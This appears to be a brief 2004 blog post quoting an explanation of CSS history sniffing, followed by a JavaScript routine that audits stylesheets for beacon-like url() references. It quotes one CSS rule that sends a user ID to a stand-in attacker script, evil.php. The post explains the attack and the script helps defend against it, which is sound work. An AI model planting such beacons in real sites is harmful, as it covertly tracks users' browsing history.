Wednesday, May 26, 2004

CSS Snoop (from SitePoint):

Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:

#examplelink { background-image: url(evil.php?user=123); }

That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/.
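For reviewing stylesheets you did not write (third-party or user-supplied CSS), the sketch below flags url() references like the one quoted above, which point at a server-side script or carry a query string rather than a plain static image. It is an added example, not code from this post or from SitePoint; the function names, the list of image extensions and the sample stylesheet are assumptions made for illustration.

```javascript
// Added example: audit CSS text for url() targets that look like
// server-side beacons instead of static images.
const STATIC_IMAGE = /\.(png|gif|jpe?g|svg|webp|ico)$/i; // assumed allow-list

// Constructed sample input; only the #examplelink rule comes from the post.
const SAMPLE_CSS = `
#logo { background-image: url("img/logo.png"); }
/* rule quoted in the post */
#examplelink { background-image: url(evil.php?user=123); }
.icon { background: url('sprite.svg#home') no-repeat; }
.banner { background: url(/img/banner.jpg?v=7); }
`;

// Split flat (non-nested) CSS into { selector, body } rules.
function parseRules(css) {
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(stripped)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2] });
  }
  return rules;
}

// Return one finding per suspicious url() target, with the reasons it was flagged.
function findBeaconUrls(css) {
  const findings = [];
  for (const { selector, body } of parseRules(css)) {
    const urlRe = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;
    let u;
    while ((u = urlRe.exec(body)) !== null) {
      const target = u[2];
      if (target.startsWith("data:")) continue; // inline data, no request sent
      const [path, query] = target.split("?", 2);
      const reasons = [];
      if (query !== undefined) reasons.push("query string");
      if (!STATIC_IMAGE.test(path.split("#")[0])) reasons.push("non-image path");
      if (reasons.length > 0) findings.push({ selector, target, reasons });
    }
  }
  return findings;
}

for (const f of findBeaconUrls(SAMPLE_CSS)) {
  console.log(`${f.selector}: ${f.target} (${f.reasons.join(", ")})`);
}
```

A query string alone (as on the .banner rule) is often just cache-busting, so findings with a single reason are review items rather than verdicts.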
